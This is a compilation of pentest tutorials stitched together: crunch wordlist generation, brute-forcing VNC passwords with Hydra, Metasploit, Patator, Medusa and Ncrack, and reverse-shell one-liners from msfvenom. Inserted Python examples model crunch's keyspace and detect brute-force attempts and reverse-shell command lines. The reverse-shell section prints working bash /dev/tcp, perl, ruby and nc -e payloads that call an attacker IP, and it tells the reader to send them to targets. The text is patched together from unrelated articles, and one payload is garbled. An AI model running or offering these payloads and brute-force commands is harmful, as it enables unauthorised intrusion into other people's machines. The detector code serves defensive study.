Comprehensive Guide to Crunch Tool


Hello friends!! Today we will demonstrate how a pentester can generate their own wordlist, for usernames or passwords, using the powerful tool CRUNCH. In Kali Linux you can find crunch under Application > Password Attacks > Crunch.

Crunch can generate a wordlist subject to the conditions you specify, and its output file can be fed into any other program.


We are using crunch version 3.6 for this tutorial, with the parameters described below for generating wordlists.
Syntax: crunch <min-len> <max-len> [character-string] [options]
Min-len: the minimum string length at which crunch starts generating the wordlist.
Max-len: the maximum string length at which crunch stops.
Charset string: the set of characters crunch uses to build the words; if you do not specify a string, crunch uses its default character set (lowercase a-z).
Options: crunch offers a list of options that extend how wordlists are generated to match your requirements.


Generating a wordlist without a character string
Execute the command below, which generates a dictionary with a minimum of 2 and a maximum of 3 lowercase letters per word using the default character set. It starts at aa and ends at zzz.

crunch 2 3 -o /root/Desktop/0.txt

Here we used the following parameters to generate the dictionary:
Min_len: 2, for two-letter words
Max_len: 3, for three-letter words
-o: the path of the text file in which to save the output.
From the image below you can observe that crunch generated 18252 lines and saved them in 0.txt.


Now we used the cat command to read the contents of 0.txt, where we can see that it starts at aa and ends at zzz, as shown in the image below.
cat /root/Desktop/0.txt



Generating a wordlist using a character string

Now execute the command below, which generates a dictionary with a minimum of 3 and a maximum of 4 characters per word using "raj" as the character string. It starts at rrr and ends at jjjj, because crunch follows the order of the characters you give it.

crunch 3 4 raj -o /root/Desktop/1.txt

From the image below you can observe that it generated 108 lines and saved them in 1.txt.


Now we used the cat command to read the contents of 1.txt, where we can see that it starts at rrr and ends at jjjj.
cat /root/Desktop/1.txt
Similarly, we can use a string of digits to build a dictionary of numeric words.

For example, some users set their date of birth as their password. If we want a dictionary of four-digit combinations representing a day and month, for instance 25th May as 2505, we can use "2505" as the character string to generate a numeric wordlist.
 

Generating an alpha-numeric wordlist
You can generate your own alpha-numeric wordlist. Execute the command below, which generates a dictionary with a minimum of 2 and a maximum of 4 characters per word using "raj123" as the character string.
You can set the minimum and maximum length of your wordlist as your requirements demand.

crunch 2 4 raj123 -o /root/Desktop/3.txt


Again we used the cat command to read the contents of 3.txt, where we can see that it contains combinations of alpha-numeric characters.
cat /root/Desktop/3.txt


Generating a wordlist that includes the space character
The following command generates a wordlist from the string "raj" plus the space character, escaped with a backslash (raj\ ). Instead of the backslash you can also wrap the string in double quotes with the space inside them, as "raj ".
crunch 1 3 raj\ -o /root/Desktop/4.txt


Create a wordlist using the RainbowCrack character set file

As we know, RainbowCrack ships a character set file that it uses when cracking hashes with rainbow tables, but we can reuse this file with crunch to generate a complex wordlist as the situation demands.

cat /usr/share/rainbowcrack/charset.txt

We used the cat command to display the character sets stored in RainbowCrack's charset.txt. From the image below you can observe that it lists the following character sets:
·         numeric
·         alpha
·         alpha-numeric
·         loweralpha
·         loweralpha-numeric
·         mixalpha
·         mixalpha-numeric
·         ascii-32-95
·         ascii-32-65-123-4
·         alpha-numeric-symbol32-space


Now you can choose any of these character sets for generating a wordlist. Suppose I want a wordlist of 4 to 5 character words made of lowercase letters and digits; for that I execute the following command.
crunch 4 5 -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o /root/Desktop/5.txt
Here -f selects a named character set from the given charset file (crunch's own documentation calls this file charset.lst; here we point it at RainbowCrack's charset.txt instead).


Again we used the cat command to read the contents of 5.txt, where we can see that it contains combinations of lowercase letters and digits.

cat /root/Desktop/5.txt


Generate a wordlist with a specific pattern

Crunch provides the -t option to generate a wordlist following a specific pattern of your choosing.
With -t you can use four placeholder characters, as listed below:
·         Use @ for lowercase letters
·         Use , for uppercase letters
·         Use % for numeric characters
·         Use ^ for special characters (symbols)

To generate a wordlist that has 3 numeric characters to the right of the string "raj", for instance raj123, we execute the following command.

Since the string raj has 3 letters and we want 3 more digits after it, the minimum and maximum length must equal the length of the string plus the number of pattern characters, i.e. 6.

crunch 6 6 -t raj%%% -o /root/Desktop/6.txt
Here the % placeholders in the -t pattern stand for the 3 numeric characters.


Again we used the cat command to read the contents of 6.txt, where we can see that it contains alpha-numeric words: raj followed by three digits.
cat /root/Desktop/6.txt


Generate a wordlist with a duplicate character limit
Crunch lets you bound the consecutive repetition of characters with the -d parameter together with the given pattern.
As we saw above, the pattern raj%%% starts at raj000, which means a digit may appear consecutively twice or three times, so the wordlist contains words such as raj000, raj001, raj111, raj110 and so on.
If you do not want a wordlist with such repeated digits, you can use the -d option to filter the repetition.
For example, I want to generate a wordlist using the pattern raj%%% where each digit repeats consecutively at most twice. For such a dictionary we execute the command below.
crunch 6 6 -t raj%%% -d 2% -o /root/Desktop/6.1.txt
Here we used the following parameters:
-t: the % placeholders in the pattern stand for 3 numeric characters
-d 2%: limits each digit to at most 2 consecutive occurrences


Again we used the cat command to read the contents of 6.1.txt, where we can see that it contains alpha-numeric words in which no digit appears more than twice in a row.
cat /root/Desktop/6.1.txt
If you now compare the output files 6.txt and 6.1.txt, you will notice the difference in digit repetition.


Generate a wordlist with a pattern for uppercase letters

To generate a wordlist that has 3 uppercase characters to the right of the string "raj", for instance rajABC, we execute the following command.

Since the string raj has 3 letters and we want 3 more uppercase letters after it, the minimum and maximum length must again equal the length of the string plus the number of pattern characters, i.e. 6.

crunch 6 6 -t raj,,, -o /root/Desktop/7.txt
Here the comma (,) placeholders in the -t pattern stand for the 3 uppercase letters.


Again we used the cat command to read the contents of 7.txt, where we can see that it contains mixed-case words.
cat /root/Desktop/7.txt


Similarly, we can limit the repetition of uppercase letters as done above. So if I want that no letter appears twice in a row, we can execute the command below to generate such a dictionary.
crunch 6 6 -t raj,,, -d 1, -o /root/Desktop/7.1.txt
-t: the comma (,) placeholders in the pattern stand for 3 uppercase characters
-d 1,: limits each uppercase letter to at most one consecutive occurrence, i.e. no consecutive repeats


Again we used the cat command to read the contents of 7.1.txt, where we can see that it contains mixed-case words in which no letter is repeated consecutively.
cat /root/Desktop/7.1.txt
If you now compare the output files 7.txt and 7.1.txt, you will notice the difference in letter repetition.
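Before generating a multi-gigabyte file it helps to know how large the space crunch will enumerate and what -t and -d actually change. The following Python model, written as an added example for this page and not part of crunch, reproduces the line counts reported above (18252, 108, 1000) and applies the -d filter to both the raj%%% and raj,,, patterns; the symbol set it uses for ^ is an assumption.

```python
"""Model of how crunch sizes and expands a wordlist (added example, not
crunch's own code).  Use it to estimate a keyspace before writing a huge
file, or to sanity-check a wordlist someone hands you."""
import itertools
import string

DEFAULT_CHARSET = string.ascii_lowercase  # crunch's default when no string is given

# -t placeholders as documented on this page.  The ^ symbol set is an
# assumption for the demo; crunch's real set lives in its charset file.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=",
}


def count_plain(min_len, max_len, charset=DEFAULT_CHARSET):
    """Lines written by `crunch MIN MAX [charset]`: sum of n**k over each length k."""
    n = len(charset)
    return sum(n ** k for k in range(min_len, max_len + 1))


def plain_words(min_len, max_len, charset=DEFAULT_CHARSET):
    """Yield words in crunch's order: shortest length first, charset order within."""
    for k in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=k):
            yield "".join(combo)


def longest_run(word, alphabet):
    """Longest run of one identical character drawn from `alphabet`."""
    best = run = 0
    prev = None
    for ch in word:
        run = run + 1 if ch == prev else 1
        prev = ch
        if ch in alphabet:
            best = max(best, run)
    return best


def pattern_words(pattern, dup_limit=None):
    """Expand a -t pattern.  dup_limit maps a placeholder to the maximum number
    of consecutive repeats allowed, so `-d 2%` becomes {"%": 2}."""
    slots = [PLACEHOLDERS.get(ch, ch) for ch in pattern]  # literal characters stay fixed
    limits = dup_limit or {}
    for combo in itertools.product(*slots):
        word = "".join(combo)
        if any(longest_run(word, PLACEHOLDERS[p]) > n for p, n in limits.items()):
            continue  # e.g. raj000 is dropped under -d 2%
        yield word


def count_pattern(pattern, dup_limit=None):
    return sum(1 for _ in pattern_words(pattern, dup_limit))


if __name__ == "__main__":
    print("crunch 2 3                 ->", count_plain(2, 3))                   # 18252
    print("crunch 3 4 raj             ->", count_plain(3, 4, "raj"))            # 108
    print("crunch 6 6 -t raj%%%       ->", count_pattern("raj%%%"))             # 1000
    print("crunch 6 6 -t raj%%% -d 2% ->", count_pattern("raj%%%", {"%": 2}))   # 990
    print("crunch 6 6 -t raj,,, -d 1, ->", count_pattern("raj,,,", {",": 1}))   # 16250
```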


Use permutation to generate a wordlist

The -p option generates a wordlist by permutation; with it crunch ignores the min and max length values, although two numbers must still be given. It can be used with a single word or with multiple words, as shown below.
crunch 3 6 -p raj chandel hackingarticles

From the image below you can analyse the output and see the maximum number of permutations generated.


Generate a dictionary with a limited number of words

If you look at all the results above, you will find that crunch reports the number of lines for each dictionary it generates. For instance, 0.txt has 18252 lines, and each line contains exactly one word.
So if you want to limit the number of lines generated, execute the command below.
crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt

It generates a dictionary of only 25 words and saves the output in 8.txt.


Again we used the cat command to read the contents of 8.txt, where we can see that it has only 25 words made of the letters in IGNITE.
cat /root/Desktop/8.txt


Wordlist fragmentation

Use the -b option for wordlist fragmentation, which splits a single wordlist into multiple files. It is quite a useful option for breaking a wordlist of several GB into MB-sized pieces. Note that with -b the output name must be given as -o START.
crunch 5 7 raj@123 -b 3mb -o START

From the image below you can observe that it divided a 7MB file into three text files.


Generate a compressed dictionary
Crunch lets you generate a compressed wordlist with the -z option; the supported compression parameters are gzip, bzip2, lzma and 7z. Execute the command below for compression.

crunch 5 7 raj@123 -z gzip -o START

From the image below you can observe that it generated a compressed text file.



6 Ways to Hack VNC Login Password

In this article we will learn how to gain control over the victim's PC through port 5900, used by the VNC service. There are various ways to do it; let's take the time to learn all of them, because different circumstances call for different measures.
Let's start!!

xHydra
This is the graphical version of Hydra for running a dictionary attack against port 5900. For this method to work:
Enter xhydra in your Kali Linux terminal. Select the Single Target option and give the IP of the victim PC there. Then select VNC in the box next to the Protocol option and give the port number 5900 next to the Port option.



Now go to the Passwords tab, select Password List and give the path of the text file containing all the passwords in the box next to it.


After doing this, go to the Start tab and click the Start button on the left.

Now the dictionary attack will start, and you will obtain the username and password of the victim.


Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more.
Now we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command:
hydra -s 5900 -P /root/Desktop/pass.txt -t 16 192.168.0.6 vnc
-P: path of the password list
-s: destination port number
-t: number of parallel connection tasks to run
Once the command is executed it starts the dictionary attack, and you will have the right password in no time. As you can observe, we successfully grabbed the VNC password: 098765.




Metasploit
This module tests a VNC server on a range of machines and reports successful logins. Currently it supports RFB protocol versions 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-response authentication method.
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6
msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run
Awesome!! From the image below you can observe that the same password, 098765, was found by Metasploit.


Patator

Patator is a multi-purpose brute-forcer with a modular design and flexible usage. It is quite useful for brute-force attacks against several services such as VNC, HTTP, SMB and so on.
patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0




From the image below you can observe that the dictionary attack starts and thus you obtain the password of the victim.




Medusa

Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, HTTP, IMAP, rlogin, SSH, Subversion and VNC, to name a few.
Run the following command:
medusa -h 192.168.0.6 -u root -P /root/Desktop/pass.txt -M vnc
Here
-u: username
-P: path of the password list

As you can observe, we successfully grabbed the VNC password: 098765.



Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command:
ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.0.6:5900
Here
-U: path of the username list
-P: path of the password list
As you can observe, we successfully grabbed the VNC password: 098765.
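From the defender's side, all six tools above leave the same trace: a burst of failed VNC authentications from one source, often followed by a success. The following Python detector, added here as an example and not part of any of the tools, runs that check over constructed log lines; the log format is assumed for the demo and must be adapted to your VNC server's actual messages.

```python
"""Spot the password guessing that the tools above produce, from the server
side.  Added example written for this page; the log format below is
constructed for the demo and is not any real VNC server's format."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) vncserver\[\d+\]: "
    r"Authentication (?P<result>failure|success) from (?P<src>\d{1,3}(?:\.\d{1,3}){3})$"
)
TS_FMT = "%Y-%m-%d %H:%M:%S"


def parse(lines):
    """Yield (timestamp, result, source_ip) for lines that match; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], TS_FMT), m["result"], m["src"]


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {src: info} for sources with >= threshold failures inside any
    `window`.  info also records whether a success followed the failures,
    which is the 'password found' outcome the tutorial shows."""
    failures = defaultdict(list)
    succeeded_after = set()
    for ts, result, src in parse(lines):
        if result == "failure":
            failures[src].append(ts)
        elif src in failures:          # a success only matters if guesses preceded it
            succeeded_after.add(src)
    alerts = {}
    for src, times in failures.items():
        times.sort()
        peak, j = 0, 0
        for i, t in enumerate(times):  # sliding window over the sorted timestamps
            while t - times[j] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            alerts[src] = {"peak_failures": peak, "followed_by_success": src in succeeded_after}
    return alerts


def build_sample_log():
    """Constructed log: 16 parallel guesses (hydra -t 16 style) from one host,
    then a success; one stray failure from another host; one unrelated line."""
    base = datetime(2019, 3, 4, 10, 15, 0)
    fmt = "{} vncserver[812]: Authentication {} from {}"

    def stamp(seconds):
        return (base + timedelta(seconds=seconds)).strftime(TS_FMT)

    lines = [fmt.format(stamp(i // 8), "failure", "192.168.0.9") for i in range(16)]
    lines.append(fmt.format(stamp(3), "success", "192.168.0.9"))
    lines.append(fmt.format(stamp(0), "failure", "192.168.0.20"))
    lines.append("2019-03-04 10:15:05 sshd[900]: Accepted publickey for ops from 192.168.0.2")
    return lines


if __name__ == "__main__":
    for src, info in find_bruteforce(build_sample_log()).items():
        print(src, info)  # 192.168.0.9 {'peak_failures': 16, 'followed_by_success': True}
```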



Spawn TTY Shell using Msfvenom (One Liner Payload)


Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat using the single-line payloads, also known as stagers, that come with Metasploit.
Basically there are two types of terminal: TTYs and PTYs. A TTY is a Linux/Unix terminal that was originally a hardwired device on a serial connection with a keyboard and screen, whereas a PTY is a pseudo-TTY that provides a copy of a terminal over a network connection such as SSH or telnet.

Let's start!!
Attacker: Kali Linux
Target: Ubuntu

Open the terminal in your Kali Linux and type msfconsole to load the Metasploit framework. Now search for all one-liner payloads for UNIX systems using the search command given below; it lists every cmd/unix payload that can be used to compromise a UNIX system.
search cmd/unix

From the image below you can observe that it listed all the cmd/unix payloads. In this tutorial we are going to use some of them to spawn a TTY shell.




Compromise Bash shell
To get a bash reverse shell you can use the reverse_bash payload with msfvenom as in the command below.
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R
Here we entered the following details to generate the one-liner raw payload:
-p: the type of payload, i.e. cmd/unix/reverse_bash
lhost: the listening IP address, i.e. the Kali Linux IP
lport: the listening port number, i.e. 1111 (any random port number not used by other services)
R: stands for raw payload format

As shown in the image below, the generated payload is 67 bytes. Now copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.




For example, when the target runs the malicious code (0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121>) in a terminal, the attacker gets a reverse shell through netcat.




nc -lvp 1111
As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever they wish.
For example:
whoami: shows that you are the root user on the system you have compromised.


Compromise Netcat shell

To get a netcat reverse shell you can use the reverse_netcat payload with msfvenom as in the command below.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R
Here we entered the following details to generate the one-liner raw payload:
-p: the type of payload, i.e. cmd/unix/reverse_netcat
lhost: the listening IP address, i.e. the Kali Linux IP
lport: the listening port number, i.e. 2222 (any random port number not used by other services)
R: stands for raw payload format

As shown in the image below, the generated payload is 104 bytes. Now copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.





When the target runs the malicious code ( mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0 /tmp/admson 2>&1; rm /tmp/admoszx ) in a terminal, the attacker gets a reverse shell through netcat.



nc -lvp 2222
As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system.




Compromise Perl shell

To get a perl reverse shell you can use the reverse_perl payload with msfvenom as in the command below.
msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R
Here we entered the following details to generate the one-liner raw payload:
-p: the type of payload, i.e. cmd/unix/reverse_perl
lhost: the listening IP address, i.e. the Kali Linux IP
lport: the listening port number, i.e. 3333 (any random port number not used by other services)
R: stands for raw payload format

As shown in the image below, the generated payload is 232 bytes. Now copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.




Now again, when the target runs the malicious code (perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.103:3333");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};) ) in a terminal, the attacker gets a reverse shell through netcat.




nc -lvp 3333
As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system. Here we found the target's IP address, 192.168.1.1106, by running the ifconfig command in the TTY shell.




Compromise Python shell

To get a python reverse shell you can use the reverse_python payload with msfvenom as in the command below.
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R
Here we entered the following details to generate the one-liner raw payload:
-p: the type of payload, i.e. cmd/unix/reverse_python
lhost: the listening IP address, i.e. the Kali Linux IP
lport: the listening port number, i.e. 4444 (any random port number not used by other services)
R: stands for raw payload format

As shown in the image below, the generated payload is 533 bytes. Now copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.

Again, when the target runs the following malicious code in a terminal, the attacker gets a reverse shell through netcat.

python -c "exec('...'.decode('base64'))"



nc -lvp 4444
As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever they wish.
For example:
ifconfig: shows the IP configuration of the system you have compromised.


Compromise Ruby shell

To get a ruby reverse shell you can use the reverse_ruby payload with msfvenom as in the command below.
msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R
Here we entered the following details to generate the one-liner raw payload:
-p: the type of payload, i.e. cmd/unix/reverse_ruby
lhost: the listening IP address, i.e. the Kali Linux IP
lport: the listening port number, i.e. 5555 (any random port number not used by other services)
R: stands for raw payload format

As shown in the image below, the generated payload is 131 bytes. Now copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.


Again, when the target runs the malicious code (ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end') in a terminal, the attacker gets a reverse shell through netcat.


As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever they wish.
For example:
ifconfig: shows the IP configuration of the system you have compromised.



Compromise /bin/sh shell

To get a plain command shell you can use the reverse_netcat_gaping payload with msfvenom as in the command below.
msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R
Here we entered the following details to generate the one-liner raw payload:
-p: the type of payload, i.e. cmd/unix/reverse_netcat_gaping
lhost: the listening IP address, i.e. the Kali Linux IP
lport: the listening port number, i.e. 6666 (any random port number not used by other services)
R: stands for raw payload format

As shown in the image below, the generated payload is 533 bytes. Now copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.

To reach the /bin/sh shell of the target and obtain a TTY shell, we first accessed the target's PTY terminal through SSH and then pasted the malicious code (nc 192.168.1.103 6666 -e /bin/sh) inside that PTY terminal.

nc -lvp 6666
From the image below you can observe that we successfully obtained a TTY shell on the target system.
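Every one-liner above relies on the same few primitives (a TCP socket wired to a shell via /dev/tcp, nc -e, a FIFO plus nc, IO::Socket::INET, TCPSocket with IO.popen, or a base64 exec inside python -c), and those are what a defender can look for in process command lines. The following Python scanner is an added example written for this page, not Metasploit code; the process records it checks are constructed fragments modelled on the payloads above, not complete shells.

```python
"""Flag the primitives behind the msfvenom cmd/unix one-liners in a process
command-line feed such as auditd execve records (added example written for
this page, not part of Metasploit).  Sample records are constructed."""
import re

# Each indicator matches a building block (a TCP socket wired to a shell),
# not msfvenom's exact output, so hand-edited variants still hit.
INDICATORS = [
    ("bash-devtcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("netcat-exec", re.compile(r"\bnc(?:at)?\b.*\s-e\s*/bin/(?:ba)?sh")),
    ("netcat-fifo", re.compile(r"\bmkfifo\b.*\bnc(?:at)?\b")),
    ("perl-socket-shell", re.compile(r"IO::Socket::INET.*\bsystem\b")),
    ("ruby-socket-shell", re.compile(r"TCPSocket\.new.*IO\.popen")),
    ("python-b64-exec", re.compile(r"python\S*\s+-c\s+.*exec\(.*decode\(['\"]base64")),
]


def classify(cmdline):
    """Names of every indicator present in one command line (empty if clean)."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def scan(records):
    """records: iterable of (pid, user, cmdline).  Returns [(pid, user, names)]
    for the records that match at least one indicator."""
    hits = []
    for pid, user, cmd in records:
        names = classify(cmd)
        if names:
            hits.append((pid, user, names))
    return hits


# Constructed process records.  The suspicious ones are fragments modelled on
# the payloads shown above; the rest are ordinary admin activity.
SAMPLE_RECORDS = [
    (1501, "ubuntu", "sh -c exec 121<>/dev/tcp/192.168.1.103/1111"),
    (1502, "ubuntu", "nc 192.168.1.103 6666 -e /bin/sh"),
    (1503, "ubuntu", "perl -MIO -e $c=new IO::Socket::INET(PeerAddr,\"192.168.1.103:3333\");system $1"),
    (1504, "ubuntu", "ruby -rsocket -e c=TCPSocket.new(\"192.168.1.103\",\"5555\");IO.popen(cmd,\"r\")"),
    (1505, "ubuntu", "python -c exec('aW1wb3J0IG9z'.decode('base64'))"),  # decodes to 'import os'
    (1506, "root", "nc -lvp 1111"),            # a plain listener is not a reverse shell
    (1507, "ubuntu", "python3 -c print('hello')"),
    (1508, "ops", "ssh -p 22 admin@192.168.1.103"),
]


def flagged_pids(records=SAMPLE_RECORDS):
    return [pid for pid, _, _ in scan(records)]


if __name__ == "__main__":
    for pid, user, names in scan(SAMPLE_RECORDS):
        print(pid, user, ", ".join(names))
```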